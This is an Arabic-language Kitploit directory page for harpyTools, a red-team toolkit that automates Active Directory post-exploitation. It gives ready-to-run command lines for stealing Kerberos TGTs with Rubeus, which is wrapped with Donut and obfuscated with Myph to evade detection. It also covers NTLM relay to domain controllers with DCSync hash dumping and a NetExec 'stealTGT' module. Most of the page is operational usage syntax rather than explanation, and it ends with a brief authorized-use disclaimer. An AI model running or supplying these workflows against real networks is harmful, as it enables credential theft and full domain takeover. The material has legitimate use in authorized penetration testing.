Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
harpyTools — أداة آلية لاستغلال ما بعد الاختراق في Active Directory لاستخراج تذاكر Kerberos، وهجمات ترحيل NTLM، والحركة الجانبية عبر تكامل NetExec و Impacket و Donut. | Kitploit
أدوات/GitHubGitHub/jssngc/harpytools
تصعيد الامتيازاتتوليد الحمولةالاستغلالالحركة الجانبيةشيل كودما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubjssngc/harpytools

harpyTools

أداة آلية لاستغلال ما بعد الاختراق في Active Directory لاستخراج تذاكر Kerberos، وهجمات ترحيل NTLM، والحركة الجانبية عبر تكامل NetExec و Impacket و Donut.

192منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

أدوات أتمتة الاستغلال اللاحق وترحيل المصادقة في Active Directory

يحتوي هذا المستودع على مجموعة من نصوص Python التنسيقية المصممة لتقييمات الأمان واختبارات الاختراق ضمن بيئات Active Directory. صُممت هذه الأدوات خصيصًا لسيناريوهات الاستغلال اللاحق حيث تم بالفعل الحصول على صلاحيات إدارية محلية على محطة عمل أو خادم مخترق، ويكون الهدف هو تنفيذ حركة جانبية أو تصعيد الامتيازات نحو نطاق Active Directory الأوسع.

من خلال أتمتة سير العمل التي تتضمن أدوات أمان شائعة مثل NetExec و Impacket و Donut و BloodyAD، تعمل هذه النصوص على تبسيط العمليات المعقدة متعددة الخطوات إلى عمليات قابلة للتكرار بأمر واحد.

المتطلبات الأساسية

تتطلب النصوص توفر الأدوات التالية مثبتة على النظام المضيف ومتاحة ضمن PATH الخاص بالنظام:

  • Python 3.x
  • NetExec (nxc)
  • Impacket (impacket-ntlmrelayx، impacket-secretsdump، impacket-ticketConverter)
  • Donut (مُولِّد كود شل)
  • Myph (مُجمِّع / مُبهم ثنائي)
  • BloodyAD (أداة إدارة Active Directory)
  • أدوات Linux القياسية: awk، base64

تبعيات Python اختيارية

لتحسين تنسيق إخراج وحدة التحكم، قم بتثبيت الحزم التالية:

root@kitploit:~
pip install colorama rich

نظرة عامة على المكونات

1. أداة استخراج TGT (harpyTGT.py)

تقوم هذه الأداة بأتمتة استخراج تذكرة منح التذاكر (TGT) من جلسة Windows مسجل الدخول وتحويلها إلى تنسيق ccache المتوافق مع Linux.

  • السيناريو: بمجرد الحصول على صلاحيات المدير المحلي على جهاز، تسمح هذه الأداة للمشغلين بحصاد تذاكر Kerberos لمستخدمي النطاق النشطين على ذلك المضيف، مما يتيح الحركة الجانبية دون معرفة كلمات مرورهم النصية.
  • الآلية: يُنشئ حمولة Rubeus.exe عبر Donut، ويطبق التبهم باستخدام Myph، وينفذ الملف الثنائي الناتج على المضيف الهدف إما باستخدام المهام المجدولة (schtask_as) أو mmcexec.

التنفيذ القياسي (المستخدم الهدف لديه صلاحيات إدارية):

root@kitploit:~
./harpyTGT.py -t <IP_الهدف> -u <مستخدم_المسؤول_المحلي> -p <كلمة_مرور_المسؤول_المحلي> -U <المستخدم_الهدف> -r </path/to/Rubeus.exe>

تنفيذ بديل (المستخدم الهدف يفتقر إلى صلاحيات إدارية):

root@kitploit:~
./harpyTGT.py -t <IP_الهدف> -u <مستخدم_المسؤول_المحلي> -p <كلمة_مرور_المسؤول_المحلي> -U <المستخدم_الهدف> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <IP_المهاجم>

2. أداة أتمتة ترحيل NTLM (harpyRelay.py)

تقوم هذه الأداة بتنسيق هجمات ترحيل NTLM التي تستهدف سياسات توقيع SMB أو LDAP المهيأة بشكل خاطئ على وحدات التحكم بالنطاق لتحقيق تصعيد الامتيازات على مستوى النطاق أو تنفيذ تفريغ لقاعدة بيانات NTDS (DCSync).

  • السيناريو: باستخدام صلاحيات المدير المحلي الحالية على مضيف مخترق، تجبر الأداة عملية ذات صلاحيات عالية (مثل جلسة مسؤول النطاق) على المصادقة مرة أخرى للمهاجم، مع ترحيل بيانات الاعتماد تلك إلى وحدة التحكم بالنطاق لاختراق النطاق بأكمله عبر LDAP/LDAPS.
  • الآلية: تُطلق مستمع ntlmrelayx، وتُحفز طلب مصادقة من العميل المخترق عبر NetExec، وتراقب الإخراج بحثًا عن استغلال ناجح، ثم تُفرغ تجزئات النطاق. تحتوي الأداة على إجراءات تنظيف تلقائية لتقليل الأثر على النطاق الهدف.

سير LDAPS (قياسي):

root@kitploit:~
./harpyRelay.py --target-host <IP_العميل> --local-user <المسؤول_المحلي> --local-pass <كلمة_مرور_المحلي> --domain-admin-user <مسؤول_النطاق> --attacker-ip <IP_المهاجم> --dc-ip <IP_وحدة_التحكم> --domain <DOMAIN.LOCAL>

سير LDAP (سير بديل عندما لا يتوفر LDAPS):

root@kitploit:~
./harpyRelay.py --target-host <IP_العميل> --local-user <المسؤول_المحلي> --local-pass <كلمة_مرور_المحلي> --domain-admin-user <مسؤول_النطاق> --attacker-ip <IP_المهاجم> --dc-ip <IP_وحدة_التحكم> --domain <DOMAIN.LOCAL> --no-ldaps

3. وحدة NetExec: stealTGT

وحدة مخصصة لـ NetExec (nxc) مصممة لاستخراج تذكرة منح التذاكر (TGT) من مستخدم معين مسجل الدخول على الجهاز الهدف.

تتفاعل الوحدة عبر mmcexec كـ SYSTEM، وتقوم بأتمتة إنشاء حمولة مراوغة (تغليف Rubeus باستخدام Donut و Myph)، وتنفيذها في الذاكرة، والتقاط مخرجات التذكرة المشفرة بـ Base64، وتحويلها بشفافية إلى ملف .ccache جاهز للاستخدام في Linux.

المتطلبات الأساسية على مضيف المهاجم (Kali Linux)

تتحقق الوحدة تلقائيًا من توفر الأدوات التالية مثبتة ومتاحة في $PATH الخاص بك:

  • donut
  • myph
  • impacket-ticketConverter

تثبيت الوحدة

لتحميل الوحدة الخارجية إلى NetExec، انسخ البرنامج النصي stealTGT.py إلى دليل وحدات NetExec المحلي لديك:

root@kitploit:~
cp stealTGT.py ~/.nxc/modules/

الاستخدام والصيغة

root@kitploit:~
netexec smb <IP_الهدف> -u <مستخدم_المسؤول> -p <كلمة_مرور_المسؤول> --local-auth -M stealTGT -o USER=<المستخدم_الهدف> RUBEUS=/path/to/Rubeus.exe

خيارات الوحدة (-o):

  • USER: اسم المستخدم للجلسة المسجل دخولها حاليًا والتي ترغب في حصاد TGT منها (مثل jdoe).
  • RUBEUS: المسار المحلي على جهاز المهاجم حيث يوجد الملف الثنائي الشرعي Rubeus.exe.

الميزات التشغيلية

  • تنظيف البيئة تلقائيًا: تتعقب أداة الترحيل الحسابات المؤقتة التي تم إنشاؤها أثناء التنفيذ وتحاول إزالتها تلقائيًا عبر bloodyad أو netexec بمجرد انتهاء العمليات.
  • التعامل مع البيئات غير المشفرة بـ TLS: تتضمن آليات احتياطية صريحة للبيئات التي لا تدعم وحدات التحكم بالنطاق فيها LDAP عبر TLS (LDAPS).

إخلاء مسؤولية

إشعار هام: هذا المستودع مخصص بشكل صارم للتدقيق الأمني المأذون به، وأبحاث الثغرات، والأغراض التعليمية. يُحظر تمامًا تشغيل هذه الأدوات على البنية التحتية للإنتاج دون إذن كتابي صريح مسبق من مالكي النظام. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الجانبية أو العواقب القانونية الناتجة عن نشر هذا البرنامج.

تنزيل الأداة